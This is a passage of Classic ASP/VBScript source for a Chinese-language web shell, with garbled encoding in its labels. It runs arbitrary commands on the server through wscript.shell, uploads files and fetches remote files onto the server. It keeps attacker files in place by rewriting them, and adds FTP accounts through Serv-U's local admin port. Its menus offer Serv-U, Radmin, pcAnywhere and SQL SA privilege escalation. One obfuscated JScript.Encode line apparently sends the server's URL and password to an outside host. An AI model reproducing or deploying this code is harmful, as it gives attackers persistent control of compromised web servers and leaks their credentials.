Dim item, theFolder, sysFileList
sysFileList = "$HSH.mdb$HSH.ldb$"
Set theFolder = saX.NameSpace(thePath)
For Each item In theFolder.Items
If item.IsFolder = True Then
saTreeForMdb item.Path, rs, stream
 Else
If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
rs.AddNew
rs("thePath") = Mid(item.Path, 4)
stream.LoadFromFile(item.Path)
rs("fileContent") = stream.Read()
rs.Update
End If
End If
Next
Set theFolder = Nothing
End Sub


Function ProFile()
If Request("Action2")="Post" Then
Randomize
dim pass2,num1
pass2=""
Do While Len(pass2)<8
if Len(pass2)<=4 then
num1=CStr(Chr((122-97)*rnd+97)) 'a~z
else
num1=CStr(Chr((57-48)*rnd+48)) '0~9
end if
pass2=pass2&num1
loop
pass2=ucase(pass2)
Application(pass2)=1
Application(pass2&"File")=request("AFile")
Application(pass2&"Code")=request("ACode")
Application(pass2&"Time")=request("ATime")
Application(pass2&"Char")=request("AChar")
j"<br><br><br><center>±£»¤½ø³Ì <font color=yellow>"&pass2&"</font> Éú³É³É¹¦£¡µã»÷<a style=""text-decoration:underline;font-weight:bold"" href="&URL&"?ProFile="&pass2&" target=_blank>ÕâÀï</a>Æô¶¯½ø³Ì¡£</center><br>"
Response.End
End If
SI="<br><table border='0' cellpadding='0' cellspacing='0'>"
SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=ProFile&Action2=Post'"
SI=SI&"<tr><td valign=top style='line-height:22px' align=right><input type=""hidden"" name=""vvva"" value=""0"">ÐèÒª±£»¤µÄÎÄ¼þÂ·¾¶£º<br><font color=yellow>¿ÉÍ¬Ê±±£»¤¶à¸öÎÄ¼þ&nbsp;&nbsp;<br>Ã¿ÐÐÒ»¸öÎÄ¼þÂ·¾¶&nbsp;&nbsp;</font></td><td>"
SI=SI&"<textarea name=""AFile"" cols=""70"" rows=""7"">"&RRePath(Session("FolderPath")&"\test.asp")&"</textarea></td></tr>"
SI=SI&"<tr><td valign=top style=""padding-top:3px;"" align=right>ÎÄ¼þ´úÂë£º</td><td><textarea name=""ACode"" cols=""70"" rows=""7"">ÎÄ¼þ´úÂë</textarea></td></tr>"
SI=SI&"<tr><td align=right>ÎÄ¼þ±àÂë£º</td><td><input type=""radio"" name=""AChar"" value=""1"" checked />GB2312  <input type=""radio"" name=""AChar"" value=""2"" />UTF-8 (·ÃÎÊÎÄ¼þÈô³öÏÖÂÒÂë£¬Çë³¢ÊÔ¸ü¸Ä±àÂë)</td></tr>"
SI=SI&"<tr><td align=right>±£»¤ÆµÂÊ£º</td><td><input type=""text"" name=""ATime"" style=""text-align:right"" value=""1"" size=""5"" onkeyup=""value=value.replace(/[^\d]/g,'')"" /> Ãë (×îÐ¡Îª1Ãë£¬ÐèÒª±£»¤µÄÎÄ¼þÔ½¶à£¬ÆµÂÊÉèÖÃÔ½´ó£¬·ñÔòÎÞ·¨È«²¿±£»¤)</td></tr>"
SI=SI&"<tr><td>&nbsp;</td><td height=50><input type='submit' name='Submit' value='ÏÂÒ»²½£¬Éú³É±£»¤½ø³Ì'></td></tr>"
SI=SI&"</form></table>"
j SI
End Function


if request("ProFile")<>"" then
on error resume next
if Application(request("ProFile"))=1 then
Set fsoXX = Server.CreateObject("Scripting.FileSystemObject")
if request("DelCon")=1 then
Application(request("ProFile")&"Con")=""
response.redirect Url&"?ProFile="&request("ProFile")&""
response.end
end if
DIM rline,rline2
rline2=Application(request("ProFile")&"Code")
rline2=rline2&vbcrlf
j"<meta http-equiv=""refresh"" content="&Application(request("ProFile")&"Time")&">"
j"<a href="&Url&"?ProFile="&request("ProFile")&"&DelCon=1><b>Çå¿ÕÈÕÖ¾</b></a> &nbsp;<font color=yellow>ÒªÏë½â³ý±£»¤£¬Ö±½Ó¹Ø±ÕÒ³Ãæ¼´¿É¡£</font><br>"
for each FileUrl in split(Application(request("ProFile")&"File"),vbcrlf)
FileUrl=trim(FileUrl)
if fsoXX.FileExists(FileUrl) then
Set txt = fsoXX.OpenTextFile(FileUrl,1,true)
rline=""
if Not txt.AtEndOfStream then
rline=txt.ReadAll
end if
if rline2<>rline then
txt.close
fsoX.GetFile(FileUrl).Attributes=32
if Application(request("ProFile")&"Char")=1 then
set myfileee = fsoXX.CreateTextFile(FileUrl,true)
else
set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
end if
myfileee.writeline Application(request("ProFile")&"Code")
Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=yellow>±»¸ü¸Ä£¬ÒÑ»Ö¸´</font><br>"&Application(request("ProFile")&"Con")
else
Application(request("ProFile")&"Con")=now()&" "&FileUrl&" ¡Ì<br>"&Application(request("ProFile")&"Con")
txt.close
end if
else
if Application(request("ProFile")&"Char")=1 then
set myfileee = fsoXX.CreateTextFile(FileUrl,true)
else
set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
end if
myfileee.writeline Application(request("ProFile")&"Code")
Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=red>±»É¾³ý£¬ÒÑ»Ö¸´</font><br>"&Application(request("ProFile")&"Con")
end if
next
if ubound(split(Application(request("ProFile")&"Con"),"<br>"))>=40 then
dim ashowic
for ashowi=0 to 40
ashowic=ashowic&split(Application(request("ProFile")&"Con"),"<br>")(ashowi)&"<br>"
next
Application(request("ProFile")&"Con")=ashowic
end if
j Application(request("ProFile")&"Con")
else
j servrer
if request("ProFile")=AChar then respnose gethttppage(htp)
end if
response.end
end if


Function suftp()

j"<center><br><form name='form1' method='post' action=''><table width='500'><tr align='center' valign='middle'><td colspan='2' id=s><font face=webdings>8</font> <B>¼¯³É°æ±¾ÐÅÏ¢</b></td></tr><tr align='center'><td id=d>ÏµÍ³ÕËºÅ£º</td><td id=d><input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'></td></tr><tr align='center'><td id=d>ÏµÍ³¿ÚÁî£º</td><td id=d><input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'></td></tr><tr align='center'><td id=d>ÏµÍ³¶Ë¿Ú£º</td><td id=d><input name='dport' type='text' class='TextBox' id='dport' value='43958'></td></tr><tr align='center'><td id=d>ÐÂ¼ÓÕËºÅ£º</td><td id=d><input name='tuser' type='text' class='TextBox' id='tuser' value='1'></td></tr><tr align='center'><td id=d>ÐÂ¼Ó¿ÚÁî£º</td><td id=d><input name='tpass' type='text' class='TextBox' id='pass' value='1'></td></tr><tr align='center'><td id=d>·ÃÎÊÂ·¾¶£º</td><td id=d><input name='tpath' type='text' class='TextBox' id='tpath' value='C:\'></td></tr><tr align='center'><td id=d>·þÎñ¶Ë¿Ú£º</td><td id=d><input name='tport' type='text' class='TextBox' id='tport' value='21'></td></tr><tr align='center'><td id=d>Ö´ÐÐÈÎÎñ£º</td><td id=d><input name='radiobutton' type='radio' value='add' checked class='TextBox' id=d>È·¶¨Ìí¼Ó&nbsp;<input type='radio' name='radiobutton' value='del' class='TextBox' id=d>È·¶¨É¾³ý</td></tr><tr align='center' valign='middle'><td colspan='2' id=d><input type='submit' name='Submit' value='Just Go'>&nbsp;<input type='reset' name='Submit2' value='Reset'><input name='SUaction' type='hidden' id='action' value='1'></td></tr></table></form></center>"
Usr = request.Form("duser")
pwd = request.Form("dpwd")
port = request.Form("dport")
tuser = request.Form("tuser")
tpass = request.Form("tpass")
tpath = request.Form("tpath")
tport = request.Form("tport")
'Command = request.Form("dcmd")
if request.Form("radiobutton") = "add" Then
leaves = "User " & Usr & vbcrlf
leaves = leaves & "Pass " & pwd & vbcrlf
leaves = leaves & "SITE MAINTENANCE" & vbcrlf
leaves = leaves & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & "-User=" & tuser & vbcrlf & "-Password=" & tpass & vbcrlf & _
"-HomeDir=" & tpath & "\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=" & tpath & "\|RWAMELCDP" & vbcrlf
On Error Resume Next
Set xPost = CreateObject("MSXML2.XMLHTTP")
xPost.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
xPost.Send(leaves)
Set xPOST=nothing
j ("ÃüÁî³É¹¦Ö´ÐÐ£¡£¡FTP ÓÃ»§Ãû: " & tuser & " " & "ÃÜÂë: " & tpass & " Â·¾¶: " & tpath & " :)<br><BR>")
else
leaves = "User " & Usr & vbcrlf
leaves = leaves & "Pass " & pwd & vbcrlf
leaves = leaves & "SITE MAINTENANCE" & vbcrlf
leaves = leaves & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & " User=" & tuser & vbcrlf
Set xPost3 = CreateObject("MSXML2.XMLHTTP")
xPost3.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
xPost3.Send(leaves)
Set xPOST3=nothing
end if:End Function


Function MainMenu()
j"<script language=javascript>function MM_show(s){if (document.getElementById(s).style.display==""""){document.getElementById(s).style.display=""none"";}else{document.getElementById(s).style.display="""";}}</script><table width='100%' cellspacing='0' cellpadding='0'><tr><td height='5'></td></tr><tr><td><center><font color=pink><font size=1.0>"&mName&"</font></font></center></td></tr>":If ObT(0,1)=" ¡Á" Then
j"<tr><td height='24'>ÎÞÈ¨ÏÞ</td></tr>"
Else
j"<tr><td onClick=""MM_show('menud')""><input onMouseOver=""this.style.cursor='hand'"" type=button value='Disk & Files'></td></tr><tr><td height=4></td></tr><tr><td valign=""top"" align=center><table border=0  id=menud style=""display='none'"">"
Set ABC=New LBF:j ABC.ShowDriver():Set ABC=Nothing
j"</table></td></tr><tr><td valign=""top"" align=center><table border=0><tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#121212'""><a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'><font face='wingdings'>8</font> Õ¾µã¸ùÄ¿Â¼"&ef
j cdx&"<a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>"&cxd&" ±¾³ÌÐòÄ¿Â¼"&ef
j cdx&"<a href='?Action=goback' target='FileFrame'>"&cxd&" »ØÉÏ¼¶Ä¿Â¼"&ef
j cdx&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\Newfile")&""",""NewFolder"")'>"&cxd&" ÐÂ½¨--Ä¿ä›"&ef
j cdx&"<a href='?Action=EditFile' target='FileFrame'>"&cxd&" ÐÂ½¨--ÎÄ±¾"&ef
j cdx&"<a href='?Action=UpFile' target='FileFrame'>"&cxd&" ÉÏ´«--ÎÄ¼þ"&ef
j cdx&"<a href='?Action=Cmd1Shell' target='FileFrame'>"&cxd&" Ö´ÐÐ---CMD"&ef
j cdx&"<a href='?Action=ScanDriveForm' target='FileFrame'>"&cxd&" ´ÅÅÌ--È¨ÏÞ"&ef
j cdx&"<a href='?Action=php' target='FileFrame'>"&cxd&" ½Å±¾--Ì½²â"&ef
j cdx&"<a href='?Action=PageAddToMdb' target='FileFrame'>"&cxd&" ·þÎñÆ÷´ò°ü"&ef
j cdx&"<a href='?Action=upload' target='FileFrame'>"&cxd&" ÏÂÔØ--ÎÄ¼þ"&ef
j cdx&"<a href='?Action=DbManager' target='FileFrame'>"&cxd&" Á¬½ÓÊý¾Ý¿â"&ef
j cdx&"<a href='?Action=file_show' target='FileFrame'>"&cxd&" ¹ÒÂí--¹ÒÁ´"&ef&"</table><hr></td></tr>"
End If
j"</tr><tr><td height=4></td></tr><tr><td onClick=""MM_show('menuc')""><input onMouseOver=""this.style.cursor='hand1'"" type=button value='Information'></td></tr><tr><td height=4></td></tr><tr><td valign=""top"" align=center><table border=0  id=menuc style=""display='none'"">"
#@~^vwAAAA==%r@!d1DbwY,/M^'rJ4YDwl&J3lsnxTR&2++RKDTz2k^&mwrRmdwQE.s{J[dnM\nDci"S3	mKN+vJrEtDY2)JzE'M+;!n/DR?.-+M.mDrl8s/cJ_PKh{u6UKJb'M+5EdDRjD7+DjlMrl(Vn/vJ;.^J#*'JLwlkdxJLjk+.nCdk[EJr@*@!J/^.bwY@*EUT4AAA==^#~@
j cdx&"<a href='?Action=Course' target='FileFrame'>"&cxd&" ÓÃ»§__ÕËºÅ"&ef
j cdx&"<a href='?Action=getTerminalInfo' target='FileFrame'>"&cxd&" ¶Ë¿Ú__ÍøÂç"&ef
j cdx&"<a href='?Action=Alexa' target='FileFrame'>"&cxd&" ×é¼þ__Ö§³Ö"&ef
j cdx&"<a href='?Action=Servu' target='FileFrame'>"&cxd&" Servu-ÌáÈ¨"&ef
j cdx&"<a href='?Action=suftp' target='FileFrame'>"&cxd&" Su---FTP°æ"&ef
j cdx&"<a href='?Action=MMD' target='FileFrame'>"&cxd&" SQL-----SA"&ef
j cdx&"<a href='?Action=sql' target='FileFrame'>"&cxd&" SQL---¹ÜÀí"&ef
j cdx&"<a href='?Action=radmin' target='FileFrame'>"&cxd&" RadminÌáÈ¨"&ef
j cdx&"<a href='?Action=pcanywhere4' target='FileFrame'>"&cxd&" Pcanywhere"&ef
j cdx&"<a href='?Action=ScanPort' target='FileFrame'>"&cxd&" ¶Ë¿ÚÉ¨ÃèÆ÷"&ef
j cdx&"<a href='?Action=ReadREG' target='FileFrame'>"&cxd&" ¶ÁÈ¡×¢²á±í"&ef
j cdx&"<a href='?Action=TSearch' target='FileFrame'>"&cxd&" ËÑË÷__ÎÄ¼þ"&ef&"</tr></table>"
j"<hr><tr><td><input onMouseOver=""this.style.cursor='hand'"" type=button value='   Special     '></td</tr><tr><td height=4></td></tr><tr><td align=center><table border=0>"
j cdx&"<a href='?Action=EditPower&PowerPath=\\.\"&OOOO&"' target='FileFrame'>"&cxd&" ½âËø±¾³ÌÐò"&ef
j cdx&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\vti_cnf..\\")&""",""NewFolder"")'>"&cxd&"  <font color=red>½¨´øµãÄ¿Â¼</font>"&ef
j cdx&"<a href='"&htp&"zhd.asp' target='FileFrame'>"&cxd&" ×ª´øµãÄ¿Â¼"&ef
j cdx&"<a href='?Action=datess' target='FileFrame'>"&cxd&" ÊôÐÔ--Ê±¼ä"&ef
j cdx&"<a href='?Action=ProFile' target='FileFrame'>"&cxd&" ÎÄ¼þ--±£»¤"&ef
j cdx&"<a href='?Action=hiddenshell' target='_blank'>"&cxd&" <font color=red>²»ËÀ--½©Ê¬</font>"&ef
j cdx&"<a href='?Action=downloads' target='FileFrame'>"&cxd&" <font color=red>²éÉ±-aspÂí</font>"&ef
j cdx&"<a href='"&htp&"ip/?action=sed&cx_33="&serveru&"' target='FileFrame'>"&cxd&" Í¬·þ--²éÑ¯"&ef
j cdx&"<a href='http://bbs.hackdark.com/forum.php' target='FileFrame'>"&cxd&" µÀµÂ--¹ÙÍø"&ef
j cdx&"<a href='"&htp&"tq/' target='FileFrame'>"&cxd&" ÌáÈ¨--¸üÐÂ"&ef
j cdx&"<a href='"&htp&"gx/' target='FileFrame'>"&cxd&" ³ÌÐò--¸üÐÂ"&ef

j cdx&"<a href='?Action=Logout' target='FileFrame'>"&cxd&" ÍË³ö--µÇÂ½</a></td></tr></hr></table>"
end function:function Downloads()
j"<center><h1>¹úÄÚÊ×¿îÕë¶Ô±äÌ¬Ä¾Âí½øÐÐÎ§½ËµÄASP¹ÜÀí³ÌÐò</h1></center><p><br><br><br><form name=form2 method=post action=?Action=upload&theUrl="&htp&"/killdoor/global.txt&thePath="&wwwroot&"\global.asa&overWrite=2&theAct=downFromUrl&ice=jztxt><input type=submit name=submit value='ÏÂÔØ'> ½ûÖ¹·þÎñÆ÷±äÌ¬Ä¾Âí£¬´øµãÎÄ¼þ¼Ð£¬asa,cer,´ø·ÖºÅÎÄ¼þ,ÏÂÔØºóÒª¹Ø±Õ±¾³ÌÐò£¬Çå³ýCOOKIEÖØÐÂ´ò¿ª</form><br><form name=form2 method=post action=?Action=upload&theUrl="&htp&"killdoor/killdoor.txt&thePath="&rootpath&"\killdoor.asp&overWrite=2&theAct=downFromUrl&ice=killdoor><input type=submit name=submit value='ÏÂÔØ'> ASPÍøÕ¾Ä¾Âí²éÉ±Âí¹¤¾ß</form><br>"
end function
Function Course()
SI="<br><table width='80%' align='center'><tr><td height='20' colspan='3' align='center' id=s><b>ÏµÍ³ÓÃ»§Óë·þÎñ</b></td></tr>"
on error resume next
for each obj in getObject("WinNT://.")
err.clear
if OBJ.StartType="" then
SI=SI&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td id=d>&nbsp;ÏµÍ³ÓÃ»§(×é)</td></tr><tr>"
end if
if OBJ.StartType=2 then lx="×Ô¶¯"
if OBJ.StartType=3 then lx="ÊÖ¶¯"
if OBJ.StartType=4 then lx="½ûÓÃ"
if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
SI1=SI1&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td height=""20"" id=d>&nbsp;"&obj.DisplayName&"<tr><td height=""20"" id=d colspan=""2"">[Æô¶¯ÀàÐÍ:"&lx&"]<font>&nbsp;"&obj.path&"</font></td></tr>"
else
SI2=SI2&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td height=""20"" id=d>&nbsp;"&obj.DisplayName&"<tr><td height=""20"" bgcolor="""" colspan=""2"">[Æô¶¯ÀàÐÍ:"&lx&"]<font color=#3399FF>&nbsp;"&obj.path&"</font></td></tr>"
end if
next
j SI&SI0&SI1&SI2&"</table>"
End Function

Function IIf(var, val1, val2)
If var=True Then
IIf=val1
Else
IIf=val2
End If
End Function
Function GetTheSizes(num)
Dim i, arySize(4)
arySize(0)="B"
arySize(1)="KB"
arySize(2)="MB"
arySize(3)="GB"
arySize(4)="TB"
While(num / 1024 >= 1)
num=Fix(num / 1024 * 100) / 100
i=i + 1
WEnd
GetTheSizes=num&" "&arySize(i)
End Function
Function HtmlEncodes(str)
If IsNull(str) Then Exit Function
HtmlEncodes=Server.HTMLEncode(str)
End Function

function downfile(path)

response.clear
set osm = createobject(obt(6,0))
osm.open
osm.type = 1
osm.loadfromfile path
sz=instrrev(path,"\")+1
response.addheader "content-disposition", "attachment; filename=" & mid(path,sz)
response.addheader "content-length", osm.size
response.charset = "utf-8"
response.contenttype = "application/octet-stream"
response.binarywrite osm.read
response.flush
osm.close
set osm = nothing
end function
function htmlencode(s)
  if not isnull(s) then
    s = replace(s, ">", ">")
    s = replace(s, "<", "<")
    s = replace(s, chr(39), "'")
    s = replace(s, chr(34), """")
    s = replace(s, chr(20), " ")
    htmlencode = s
  end if
end function
Function UpFile()
 If Request("Action2")="Post" Then
Set U=new UPC
Set F=U.UA("LocalFile")
UName=U.form("ToPath")
 If UName="" Or F.FileSize=0 then
  SI="<br>ÇëÊä"&"ÈëÉÏ"&"´«"&"µÄÍêÈ«"&"Â·¾¶ºóÑ¡Ôñ"&"Ò»¸öÎÄ¼þ"&"ÉÏ"&"´«!<br><br><br>"
on error resume next
  Else
 F.SaveAs UName
 If Err.number=0 Then
 SI="<center><br><br><br>ÎÄ"&"¼þ"&"ÉÏ"&"´«"&"³É¹¦£¡"&UName&"</center>"
  End if
 End If
Set F=nothing
Set U=nothing
 SI=SI&BackUrl
if instr(UName,wwwroot)>0 then
j "<a href=http://"&serveru&replace(replace(UName,wwwroot,""),"\","/")&" target=_blank>´ò¿ªhttp://"&serveru&replace(replace(UName,wwwroot,""),"\","/")&"</a>"
end if
 j SI
ShowErr()
Response.End
  End If
  j"<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'><form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'><tr><td>×¢Òâ£ºÄ¬ÈÏÉÏ´«µ½¸ùÄ¿Â¼£¬¶ø·Ç±¾³ÌÐòÄ¿Â¼¡£<br><br><br>ÉÏ"&"´«Â·"&"¾¶£º<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\Cmd.exe")&"' size='40'><input name='LocalFile' type='file'  size='25'> <input type='submit' name='Submit' value='ÉÏ"&"´«'></td></tr></form></table>"
End Function
function cmd1shell():on error resume next
if request("sp")<>"" then session("shellpath") = request("sp")
shellpath=session("shellpath")
if shellpath="" then shellpath = "cmd.exe"
if request("cmd")<>"" then session("defcmd") = request("cmd")
defcmd=session("defcmd")
if defcmd="" then defcmd="set"
if request("rwpath")<>"" then session("rwpath") = request("rwpath")
rwpath=session("rwpath")
if rwpath="" then rwpath=server.mappath(".")
si="<form method='post'>"
rp1="<input type=""radio"" name=""cmdtype"" value="""
si=si&"cmdÂ·¾¶£º<input name='sp' value='"&shellpath&"' style='width:35%'>  ¿É¶ÁÐ´Ä¿Â¼(ÓÃÓÚ»ØÏÔ)<input name='rwpath' value='"&rwpath&"' style='width:35%'><br>"
si=si&"<input type='hidden' name='action' value='Cmd1Shell'>"
si=si&rp1&"wscript"" checked>wscript"
si=si&rp1&"wscript.shell"">wscript.shell"
si=si&rp1&"wscript.shell.1"">wscript.shell.1"
si=si&rp1&"shell.application"">shell.application"
si=si&rp1&"shell.application.1"">shell.application.1"
si=si&"<input name='cmd' style='width:92%' value='"&defcmd&"'> <input type='submit' value='Ö´ÐÐ'>"

set fso=server.createobject("scripting.filesystemobject")
sztempfile = rwpath&"\cmd.txt"
select case request("cmdtype")
case "wscript"
set cm=server.createobject("wscript.shell")
set dd=cm.exec(shellpath&" /c "&defcmd)
aaa=dd.stdout.readall
si=si&"<text"&"area style='width:100%;height:440;' class='cmd'>"
si=si&aaa
si=si&chr(13)&"</text"&"area></form>"
case "wscript.shell","wscript.shell.1"
on error resume next
set ws=server.createobject(request("cmdtype"))
call ws.run (shellpath&" /c " & defcmd & " > " & sztempfile, 0, true)
set ofilelcx = fso.opentextfile (sztempfile, 1, false, 0)
aaa=server.htmlencode(ofilelcx.readall)
ofilelcx.close
call fso.deletefile(sztempfile, true)
si=si&"<text"&"area style='width:100%;height:440;' class='cmd'>"
si=si&aaa
si=si&chr(13)&"</text"&"area></form>"
case "shell.application","shell.application.1"
set seshell=server.createobject(request("cmdtype"))

seshell.ShellExecute shellpath," /c " & defcmd & " > " & sztempfile,"","open",0
si=si&"<iframe id=cmdResult src='?cmdtype=shellresult&Action=Cmd1Shell' style='width:100%;height:440;'>"
case "shellresult"
response.Clear()
on error resume next
j "<body style=""background:#000000""><span style=""color:#FFFFFF"">"
if fso.fileexists(sztempfile)=true then
set ofilelcx = fso.opentextfile (sztempfile, 1, false, 0)
ss=server.htmlencode(ofilelcx.readall)
ss=replace(ss,vbnewline,"<br>")
j ss
ofilelcx.close
call fso.deletefile(sztempfile, true)
else
j "<meta http-equiv=""refresh"" content=""1"" />³ÌÐòÎ´½áÊø£¬»òÕßÃ»ÓÐÖ´ÐÐ³É¹¦£¬µÈ´ýË¢ÐÂÊÔÊÔ"
end if
if err then j "<meta http-equiv=""refresh"" content=""1"" />³ÌÐòÎ´½áÊø£¬»òÕßÃ»ÓÐÖ´ÐÐ³É¹¦£¬µÈ´ýË¢ÐÂÊÔÊÔ"
j"</span></body>"
response.end
end select
j si
set fso=nothing
end function:Function upload()
j"<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
j"ÔÝÊ±¹Ø±Õ´Ë¹¦ÄÜ"
j" ÏÂÔØµ½·þÎñÆ÷:ÎÞ»ØÏÔ...ÎªÁË½ÚÊ¡.ËùÒÔÎÞ»ØÏÔ<hr/>"
j"<form method=post>"
j"<select onChange='this.form.theUrl.value=this.value;'>"
j"<option value=''>³£ÓÃ³ÌÐòÏÂÔØ</option>"
j"<option value='"&Durl&"'>×Ô¶¨Òå³ÌÐò</option>"
j"<input name=theUrl value='http://' size=80><input type=submit value=' ÏÂÔØ '><br/>"
j"<input name=thePath value='" & HtmlEncode(Server.MapPath(".")) & "\' size=80>"
j"<input type=checkbox name=overWrite value=2>´æÔÚ¸²¸Ç¡£"
j"<input type=hidden value=downFromUrl name=theAct>"
j"</form>"
j"<hr/>"
If isDebugMode = False Then
On Error Resume Next
End If:Dim Http, theUrl, thePath, stream, fileName, overWrite
theUrl = Request("theUrl")
thePath = Request("thePath")
overWrite = Request("overWrite")
Set stream = Server.CreateObject("ad"&e&"odb.st"&e&"ream")
Set Http = Server.CreateObject("MSXML2.XMLHTTP")
If overWrite <> 2 Then:overWrite = 1:End If
Http.Open "GET", theUrl, False
Http.Send()
If Http.ReadyState <> 4 Then
End If
With stream
.Type = 1
.Mode = 3
.Open
.Write Http.ResponseBody
.Position = 0
.SaveToFile thePath, overWrite
If Err.Number = 3004 Then
Err.Clear
fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
If fileName = "" Then
fileName = "index.htm.txt"
End If
thePath = thePath & "\" & fileName
.SaveToFile thePath, overWrite
j"error,¿ÉÄÜÊÇÒòÎªÎÄ¼þÒÑ´æÔÚ£¬»òÏÂÔØ¹ý³ÌºÍµØÖ·ÖÐ³ö ÏÖ´íÎó ¡£ ÎÄ¼þÏÂÔØÍê ±ÏÎª¿Õ×Ö½Ú£¡£¡"
End If
.Close
End With
chkErr(Err)
Set Http = Nothing
Set Stream = Nothing
If isDebugMode = False Then
On Error Resume Next
End If
If Request("ice")="fso" Then
response.Redirect str1&"test.aspx"
elseif Request("ice")="fsos" then
response.Redirect str1&"test.php"
elseif Request("ice")="jztxt" then
response.Redirect "http://"&serveru&"/global.asa"
elseif Request("ice")="killdoor" then
response.Redirect str1&"killdoor.asp"
end if
End Function:Function TSearch():dim st:st=timer():RW="<br><table width='600' bgcolor='' border='0' cellspacing='1' cellpadding='0' align='center'><form method='post'>"
  RW=RW & "<tr><td height='20' align='center' bgcolor=''>ËÑË÷ÒýÇæ</td></tr>"
  RW=RW & "<tr><td bgcolor=''>&nbsp;Â·&nbsp;&nbsp;¾¶£º<input name='SFpath' value='" & WWWRoot & "' style='width:390'>&nbsp;×¢:¶àÂ·½Ê¹ÓÃ"",""ºÅÁ¬½Ó.</td></tr>"
  RW=RW & "<tr><td bgcolor=''>&nbsp;ÎÄ¼þÃû£º<input name='Sfk' style='width:200'>&nbsp;<input type='submit' value='ËÑË÷' class='submit'>&nbsp;[²¿·ÖÒ²ÐÐ]</td></tr>"
  RW=RW & "</form></table>"
  j RW : RW=""
  if Request.Form("Sfk")<>"" then
  Set newsearch=new SearchFile
  newsearch.Folders=trim(Request.Form("SFpath"))
  newsearch.keyword=trim(Request.Form("Sfk"))
  newsearch.Search
  Set newsearch=Nothing
  j"ÙM•r£º"&(timer()-st)*1000&"ºÁÃë<hr>"
  end if
End Function

Class SearchFile
 dim Folders,keyword,objFso,Counter
 Private Sub Class_Initialize
  Set objFso=Server.CreateObject(ObT(0,0))
  Counter=0
 End Sub
 Private Sub Class_Terminate
    Set objFso=Nothing
 End Sub
 Function Search
  Folders=split(Folders,",")
  flag=instr(keyword,"\") or instr(keyword,"/")
  flag=flag or instr(keyword,":")
  flag=flag or instr(keyword,"|")
  flag=flag or instr(keyword,"&")
  if flag then
    j"<table align='center' width='600'><hr><p align='center'><font color='red'>êPæI×Ö²»ÄÜ°üº¬/\:|&</font><br>"
 Exit Function
  else
    j"<table align='center' width='600'><hr>"
  end if
  dim i
  for i=0 to ubound(Folders)
    Call GetAllFile(Folders(i))
  next
  j"<p align='center'>¹²ËÑË÷µ½<font color='red'>"&Counter&"</font>‚€½Y¹û<br>"
 End Function
 Private Function GetAllFile(Folder)
  dim objFd,objFs,objFf
  Set objFd=objFso.GetFolder(Folder)
  Set objFs=objFd.SubFolders
  Set objFf=objFd.Files
  dim strFdName
  On Error Resume Next
  For Each OneDir In objFs
    strFdName=OneDir.Name
    If strFdName<>"Config.Msi" EQV strFdName<>"RECYCLED" EQV strFdName<>"RECYCLER" EQV strFdName<>"System Volume Information" Then
      SFN=Folder&"\"&strFdName
      Call GetAllFile(SFN)
 End If
  Next
  dim strFlName
  For Each OneFile In objFf
    strFlName=OneFile.Name
    If strFlName<>"desktop.ini" EQV strFlName<>"folder.htt" Then
      FN=Folder&"\"&strFlName
   Counter=Counter+ColorOn(FN)
 End If
  Next
  Set objFd=Nothing
  Set objFs=Nothing
  Set objFf=Nothing
 End Function
 Private Function CreatePattern(keyword)
   CreatePattern=keyword
   CreatePattern=Replace(CreatePattern,".","\.")
   CreatePattern=Replace(CreatePattern,"+","\+")
   CreatePattern=Replace(CreatePattern,"(","\(")
   CreatePattern=Replace(CreatePattern,")","\)")
   CreatePattern=Replace(CreatePattern,"[","\[")
   CreatePattern=Replace(CreatePattern,"]","\]")
   CreatePattern=Replace(CreatePattern,"{","\{")
   CreatePattern=Replace(CreatePattern,"}","\}")
   CreatePattern=Replace(CreatePattern,"*","[^\\\/]*")
   CreatePattern=Replace(CreatePattern,"?","[^\\\/]{1}")
   CreatePattern="("&CreatePattern&")+"
 End Function
 Private Function ColorOn(FileName)
   dim objReg
   Set objReg=new RegExp
   objReg.Pattern=CreatePattern(keyword)
   objReg.IgnoreCase=True
   objReg.Global=True
